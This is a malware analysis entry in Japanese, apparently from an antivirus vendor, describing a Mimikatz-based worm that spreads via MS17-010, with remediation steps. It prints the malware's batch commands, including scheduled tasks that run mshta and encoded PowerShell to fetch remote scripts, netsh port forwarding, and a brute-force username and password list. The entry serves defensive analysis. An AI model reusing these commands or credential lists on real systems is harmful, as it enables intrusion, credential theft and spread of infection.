Trojan.Win32.MIMIKATZ.ADV
Trojan:Win32/CryptInject(MICROSOFT); Trojan.Win32.Trickster.dmp(KASPERSKY); Python/Agent.DU!tr(FORTINET);
Windows
- マルウェアタイプ: トロイの木馬型
- 破壊活動の有無: なし
- 暗号化: はい
- 感染報告の有無: はい
概要
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
マルウェアは、バックドア活動の機能を備えていません。
マルウェアは、特定の脆弱性を利用した感染活動を実行します。 ただし、情報公開日現在、このWebサイトにはアクセスできません。
詳細
侵入方法
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
マルウェアは、以下のファイルを作成します。
- %Temp%\mkatz.ini → Mimikatz script output
- %User Temp%\_MEI{random}\{Python components}
(註:%Temp%フォルダは、一時的にファイルが保存されるフォルダで、いずれのオペレーティングシステム(OS)でも通常、 "C:\Windows\Temp" です。.. %User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。)
マルウェアは、以下のファイルを作成し実行します。
- %Temp%\m.ps1 → obfuscated Mimikatz PowerShell script, detected as Trojan.PS1.MIMIKATZ.ADS
マルウェアは、以下のプロセスを追加します。
- netsh advfirewall set allprofile state on
- netsh advfirewall firewall add rule name=denyy445 dir=in action=block protocol=TCP localport=445
- netsh firewall add portopening tcp 65532 DNS2
- netsh interface portproxy add v4tov4 listenport=65532 connectaddress={BLOCKED}.{BLOCKED}.1.1 connectport=53
- netsh firewall add portopening tcp 65531 DNSS2
- netsh interface portproxy add v4tov4 listenport=65531 connectaddress={BLOCKED}.{BLOCKED}.1.1 connectport=53
マルウェアは、以下のフォルダを作成します。
- %User Temp%\_MEI{random}
(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。)
バックドア活動
マルウェアは、バックドア活動の機能を備えていません。
ルートキット機能
マルウェアは、ルートキット機能を備えていません。
情報漏えい
マルウェアは、以下の情報を収集します。
- Computer Name
- Public IP Address
- Username
- Password
その他
マルウェアは、以下のWebサイトにアクセスして感染コンピュータのIPアドレスを収集します。
- http://{BLOCKED}.{BLOCKED}.pl/raw
- http://{BLOCKED}p.com
マルウェアは、以下を実行します。
- It connects to the following website(s) to download and execute a script:
- http://v.{BLOCKED}h.com/v{user domain}
- http://w.{BLOCKED}h.com/page.html?p{computer name}
- Port 60124 serves as its mutex to allow only one instance running.
- It deletes the user "k8h3d" if it exists, then it creates the same username afterwards on the infected machine and the vulnerable target machine.
- It scans randomly-generated IP addresses over the Internet and the local network to check for open port 445.
If it finds a target with an open port 445, it will attempt to exploit MS17-010 vulnerability and perform the following commands:- Send one of the following files to the target and saved as %System Root%\installed.exe and %System Root%\installed2.exe:
- %Windows%\System32\svhost.exe
- %Windows%\SysWOW64\svhost.exe
- %Windows%\System32\drivers\svchost.exe
- %Windows%\SysWOW64\drivers\svchost.exe
- Copy %Temp%\svchost.exe as %Windows%\{random 4-8 letters}.exe
- Move %Temp%\dig.exe as %Windows%\{random 4-8 letters}.exe
- Create a batch file named %Temp%\p.bat containing the ff. commands:
- move /y %Temp%\{Random 4-8 letters}.exe %Windows%
- netsh interface ipv6 install
- netsh firewall add portopening tcp 65532 DNS2
- netsh interface portproxy add v4tov4 listenport=65532 connectaddress={BLOCKED}.{BLOCKED}.1.1 connectport=53
- netsh firewall add portopening tcp 65531 DNSS2
- netsh interface portproxy add v4tov4 listenport=65531 connectaddress={BLOCKED}.{BLOCKED}.1.1 connectport=53
- if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetooths" /tr "powershell -ep bypass -e {base-64 string}" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\{random 4-8 letters}" /tr "%Windows%\{random 4-8 letters}.exe" /F&schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn DnsScan /tr "%Temp%\svchost.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"&schtasks /run /TN Autocheck&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "%Windows%\{random 4-8 letters}.exe"&schtasks /run /TN Autostart&schtasks /delete /TN Autoscan /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autoscan /tr "%Temp%\svchost.exe"&schtasks /run /TN Autoscan)
- net start Ddriver
- for /f %%i in (\'tasklist | find /c /i "cmd.exe"\') do set s=%%i
- if %s% gtr 10 (shutdown /r)
- net user k8h3d /del
- %Temp%\svchost.exe
- del %Temp%\p.bat
- Copies %Temp%\updll.exe and %Temp%\upinstalled.exe to the target machine, saved as the same filenames. It then creates %Temp%\tmp.vbs which executes the copied files.
- Attempt to execute the sent files on the target machine.
- Send one of the following files to the target and saved as %System Root%\installed.exe and %System Root%\installed2.exe:
マルウェアは、以下の脆弱性を利用して感染活動を実行します。
ただし、情報公開日現在、このWebサイトにはアクセスできません。
以下のスケジュールされたタスクを追加します:
- Task Name: DnsScan
Task to be Run: %Temp%\svchost.exe - Task Name: \Microsoft\windows\Bluetooths
Task to be Run: powershell -ep bypass -e {base-64 string} → downloads and executes http://v.{BLOCKED}h.com/v{user domain} - Task Name: Autocheck
Task to be Run: "cmd.exe /c mshta http://w.{BLOCKED}h.com/page.html?p%COMPUTERNAME%" - Task Name: Autoscan
Task to be Run: %Temp%\svchost.exe
注意:
マルウェアは、以下のユーザ名とパスワードを使用して、ターゲットコンピュータへのログインを試みます。
- ユーザ名:
- Administrator
- user
- admin
- test
- hp
- guest
- k8h3d
- パスワード:
- 123456
- password
- qwerty
- 12345678
- 123456789
- 123
- 1234
- 123123
- 12345
- 12345678
- 123123123
- 1234567890
- 88888888
- 111111111
- 0
- 111111
- 112233
- 123321
- 654321
- 666666
- 888888
- a123456
- 123456a
- 5201314
- 1qaz2wsx
- 1q2w3e4r
- qwe123
- 123qwe
- a123456789
- 123456789a
- baseball
- dragon
- football
- iloveyou
- password
- sunshine
- princess
- welcome
- abc123
- monkey
- !@#$%^&*
- charlie
- aa123456
- Aa123456
- admin
- homelesspa
- password1
- 1q2w3e4r5t
- qwertyuiop
- 1qaz2wsx
- ターゲットのIPアドレス:
- {BLOCKED}.{BLOCKED}.0.1/24
- {BLOCKED}.{BLOCKED}.1.1/24
- {BLOCKED}.{BLOCKED}.2.1/24
- {BLOCKED}.{BLOCKED}.3.1/24
- {BLOCKED}.{BLOCKED}.4.1/24
- {BLOCKED}.{BLOCKED}.5.1/24
- {BLOCKED}.{BLOCKED}.6.1/24
- {BLOCKED}.{BLOCKED}.7.1/24
- {BLOCKED}.{BLOCKED}.8.1/24
- {BLOCKED}.{BLOCKED}.9.1/24
- {BLOCKED}.{BLOCKED}.10.1/24
- {BLOCKED}.{BLOCKED}.18.1/24
- {BLOCKED}.{BLOCKED}.31.1/24
- {BLOCKED}.{BLOCKED}.199.1/24
- {BLOCKED}.{BLOCKED}.254.1/24
- {BLOCKED}.{BLOCKED}.67.1/24
- {BLOCKED}.{BLOCKED}.0.1/24
- {BLOCKED}.{BLOCKED}.1.1/24
- {BLOCKED}.{BLOCKED}.2.1/24
- {BLOCKED}.{BLOCKED}.1.1/24
- {BLOCKED}.{BLOCKED}.90.1/24
- {BLOCKED}.{BLOCKED}.10.1/24
- {BLOCKED}.{BLOCKED}.1.1/24
ユーザ名、パスワード、IPアドレスは、上記のリストに限定されたものではありません。ファイル %Temp%\mkatz.ini は、ドメイン、ユーザ名、およびパスワードを取得するために解析されます。これらは、ターゲットコンピュータへのログイン試行にも使用されます。
一部のコマンドが実行されるためには、情報作成時現在 HackTool.Win32.Radmin.GBとして検出されるコンポーネントが必要です。 このコンポーネントは、 ターゲットコンピュータの %Windows%ディレクトリ内に、{ランダムな8文字}.exe として作成される可能性があります。
また、以下のレジストリキーとエントリをターゲットコンピュータ上に作成します。そして、上記のコンポーネントファイルとコマンドを実行します。
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\{ランダムな4文字} DisplayName = {ランダムな4文字} ImagePath = can be %Windows%\{ランダムな8文字}.exe、または {コマンド文字列}
コンポーネントファイルとサービスは、実行後に削除される可能性があります。
<補足>
インストール
マルウェアは、以下のファイルを作成します。
- %Temp%\mkatz.ini → Mimikatzスクリプトの出力
- %User Temp%\_MEI{ランダム}\{Pythonのコンポーネント}
マルウェアは、以下のファイルを作成し実行します。
- %Temp%\m.ps1 → 難読化されたMimikatz のパワーシェルスクリプト。Trojan.PS1.MIMIKATZ.ADSとして検出される
マルウェアは、以下のフォルダを作成します。
- %User Temp%\_MEI{ランダム}
情報漏えい
マルウェアは、以下の情報を収集します。
- コンピュータ名
- パブリックIPアドレス
- ユーザ名
- パスワード
その他
マルウェアは、以下を実行します。
- マルウェアは、以下のWebサイトに接続して、スクリプトをダウンロードして実行します。
- http://v.{BLOCKED}h.com/v{ユーザドメイン}
- http://w.{BLOCKED}h.com/page.html?p{コンピュータ名}
- ポート60124は、Mutexとして機能し、1つのインスタンスのみが実行されます。
- ユーザ"k8h3d"が存在する場合、削除します。その後、感染コンピュータおよび脆弱性が存在するターゲットのコンピュータに同じユーザ名を作成します。
- インターネットとローカルネットワーク上に開放されているポート445を、無作為に生成したIPアドレスで検索します。
開放されているポート445のターゲットを見つけると、MS17-010の脆弱性を利用し、以下のコマンドを実行します。- 以下のファイルのいずれかをターゲットに送信し、%System Root%\ installed.exe、および %System Root%\ installed2.exe として保存する
- %Windows%\System32\svhost.exe
- %Windows%\SysWOW64\svhost.exe
- %Windows%\System32\drivers\svchost.exe
- %Windows%\SysWOW64\drivers\svchost.exe
- %Temp%\ svchost.exe を %Windows%\{ランダムな4~8文字}.exe としてコピーする
- %Temp%\ dig.exe を %Windows%\ {ランダムな4〜8文字}.exe として移動する
- 以下のff. コマンドが含まれる %Temp%\ p.bat という名前のバッチファイルを作成する
- move /y %Temp%\{ランダムな4〜8文字}.exe %Windows%
- netsh interface ipv6 install
- netsh firewall add portopening tcp 65532 DNS2
- netsh interface portproxy add v4tov4 listenport=65532 connectaddress={BLOCKED}.{BLOCKED}.1.1 connectport=53
- netsh firewall add portopening tcp 65531 DNSS2
- netsh interface portproxy add v4tov4 listenport=65531 connectaddress={BLOCKED}.{BLOCKED}.1.1 connectport=53
- if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetooths" /tr "powershell -ep bypass -e {base64文字列}" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\{ランダムな4~8文字}" /tr "%Windows%\{ランダムな4~8文字}.exe" /F&schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn DnsScan /tr "%Temp%\svchost.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"&schtasks /run /TN Autocheck&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "%Windows%\{ランダムな4~8文字}.exe"&schtasks /run /TN Autostart&schtasks /delete /TN Autoscan /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autoscan /tr "%Temp%\svchost.exe"&schtasks /run /TN Autoscan)
- net start Ddriver
- for /f %%i in (\'tasklist | find /c /i "cmd.exe"\') do set s=%%i
- if %s% gtr 10 (shutdown /r)
- net user k8h3d /del
- %Temp%\svchost.exe
- del %Temp%\p.bat
- %Temp%\updll.exe および %Temp%\upinstalled.ex をターゲットコンピュータにコピーし、同じファイル名で保存します。その後、%Temp%\tmp.vbs を作成してコピーしたファイルを実行する
- ターゲットマシン上で、送信したファイルの実行を試行する
マルウェアは、以下の脆弱性を利用して感染活動を実行します。
以下のスケジュールされたタスクを追加します:
- タスク名: DnsScan
実行するタスク: %Temp%\svchost.exe - タスク名: \Microsoft\windows\Bluetooths
実行するタスク: powershell -ep bypass -e {base-64 string} → downloads and executes http://v.{BLOCKED}h.com/v{user domain} - タスク名: Autocheck
実行するタスク: "cmd.exe /c mshta http://w.{BLOCKED}h.com/page.html?p%COMPUTERNAME%" - タスク名: Autoscan
実行するタスク: %Temp%\svchost.exe
対応方法
対応検索エンジン: 9.850初回 VSAPI パターンバージョン 14.822.04初回 VSAPI パターンリリース日 2019年2月18日VSAPI OPR パターンバージョン 14.823.00VSAPI OPR パターンリリース日 2019年2月19日手順 1
Windows XP、Windows Vista 、Windows 7、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。
手順 2
このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。
手順 3
Windowsをセーフモードで再起動します。
[ 詳細 ]手順 4
以下のファイルを検索し削除します。
[ 詳細 ]コンポーネントファイルが隠しファイル属性に設定されている場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。- %Windows%\{random 4-8 letters}.exe
- %Temp%\mkatz.ini
- %Temp%\m.ps1
- %Temp%\upinstalled.exe
- %Temp%\updll.exe
- %Temp%\tmp.vbs
- %Temp%\p.bat
- %Temp%\dig.exe
- %Temp%\{Random 4-8 letters}.exe
- %System Root%\setupinstalled.exe
- %System Root%\install.exe
手順 5
以下のフォルダを検索し削除します。
[ 詳細 ]フォルダが隠しフォルダ属性に設定されている場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。- %User Temp%\_MEI{random}
手順 6
スケジュールされたタスクを削除する
タスク削除の手順に含まれる{タスク名} - {実行するタスク}には以下が当てはまります。
- Task Name: DnsScan
- Task to be Run: %Temp%\svchost.exe
- Task Name: \Microsoft\windows\Bluetooths
- Task to be Run: powershell -ep bypass -e {base-64 string}
- Task Name: Autocheck
- Task to be Run: "cmd.exe /c mshta http://w.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
- Task Name: Autoscan
- Task to be Run: %Temp%\svchost.exe
Windows 2000、Windows XP、Windows Server 2003の場合:
- [スタート]→[プログラム]→[アクセサリ]→[システムツール]→[スケジュールされたタスク]をクリックして、スケジュールされたタスクを開きます。
- 上記の{タスク名} を、[名前]の欄に入力します。
- 入力した{タスク名} 持つファイルを右クリックします。
- [プロパティ]をクリックします。 [実行]フィールドで、表示されている{実行するタスク}を確認します。
- 上記の{実行するタスク}と文字列が一致するタスクを削除します。
Windows Vista、Windows 7、Windows Server 2008、Windows 8、Windows 8.1、およびWindows Server 2012の場合:
- Windowsタスクスケジューラを開きます。
• Windows Vista、Windows 7、Windows Server 2008の場合、[スタート]をクリックし、[検索]フィールドに「taskchd.msc」と入力してEnterキーを押します。
• Windows 8、Windows 8.1、Windows Server 2012の場合、画面の左下隅を右クリックし、[実行]をクリックし、「taskchd.msc」と入力してEnterキーを押します。 - 左側のパネルで、[タスクスケジューラライブラリ]をクリックします。
- 中央上部のパネルで、上記の{タスク名}を[名前]の欄に入力します。
- 中央下部のパネルで、[アクション]タブをクリックします。 [詳細]の欄で、{実行するタスク}を確認します。
- 文字列が一致するタスクを削除します。
手順 7
コンピュータを通常モードで再起動し、最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、「Trojan.Win32.MIMIKATZ.ADV」と検出したファイルの検索を実行してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
手順 8
以下の修正パッチをダウンロードし適用します。この脆弱性に対する修正パッチを適用するまで、該当製品の使用をお控えください。この製品の製造元が公開する正式な修正パッチをダウンロードし適用することをお勧めします。 Microsoft Security Bulletin MS17-010
手順 9
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.Win32.MIMIKATZ.ADV」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください - 以下のファイルのいずれかをターゲットに送信し、%System Root%\ installed.exe、および %System Root%\ installed2.exe として保存する